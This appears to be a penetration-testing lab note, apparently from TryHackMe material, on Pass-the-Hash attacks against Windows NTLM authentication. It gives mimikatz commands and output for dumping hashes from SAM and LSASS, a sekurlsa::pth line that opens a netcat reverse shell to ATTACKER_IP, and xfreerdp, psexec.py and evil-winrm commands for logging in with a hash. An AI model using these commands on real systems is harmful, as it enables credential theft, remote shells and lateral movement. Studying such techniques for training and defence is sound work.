Skip to content

Pass the Hash

NTLM

As a result of extracting credentials from a host where we have attained administrative privileges (by using mimikatz or similar tools), we might get clear-text passwords or hashes that can be easily cracked. However, if we aren't lucky enough, we will end up with non-cracked NTLM password hashes.

Although it may seem we can't really use those hashes, the NTLM challenge sent during authentication can be responded to just by knowing the password hash. This means we can authenticate without requiring the plaintext password to be known. Instead of having to crack NTLM hashes, if the Windows domain is configured to use NTLM authentication, we can Pass-the-Hash (PtH) and authenticate successfully.

To extract NTLM hashes, we can either use mimikatz to read the local SAM or extract hashes directly from LSASS memory.

Extracting NTLM hashes from local SAM


This method will only allow you to get hashes from local users on the machine. No domain user's hashes will be available.

mimikatz.exe
|->
mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> lsadump::sam  
|->
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 145e02c50333951f71d13c245d352b50

Extracting NTLM hashes from LSASS memory


This method will let you extract any NTLM hashes for local users and any domain user that has recently logged onto the machine.

mimikatz.exe
|->
mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> sekurlsa::msv 
|->
Authentication Id : 0 ; 308124 (00000000:0004b39c)
Session           : RemoteInteractive from 2 
User Name         : bob.jenkins
Domain            : ZA
Logon Server      : THMDC
Logon Time        : 2022/04/22 09:55:02
SID               : S-1-5-21-3330634377-1326264276-632209373-4605
        msv :
         [00000003] Primary
         * Username : bob.jenkins
         * Domain   : ZA
         * NTLM     : 6b4a57f67805a663c818106dc0648484   

🔥 From windows - use hash to execute command as other user


attack happen on the same machine

We can then use the extracted hashes to perform a PtH attack by using mimikatz to inject an access token for the victim user on a reverse shell (or any other command you like) as follows:

mimikatz> token::revert
mimikatz> sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"

Interestingly, if you run the whoami command on this shell, it will still show you the original user you were using before doing PtH, but any command run from here will actually use the credentials we injected using PtH.

🔥 From linux - use hash to access windows machine


from linux to windows machine attack

If you have access to a linux box (like your AttackBox), several tools have built-in support to perform PtH using different protocols. Depending on which services are available to you, you can do the following:

Connect to RDP using PtH

xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH

Connect via psexec using PtH

psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
Note: Only the linux version of psexec support PtH.

Connect to WinRM using PtH

evil-winrm -i $IP -u $USER -H $NTLM_HASH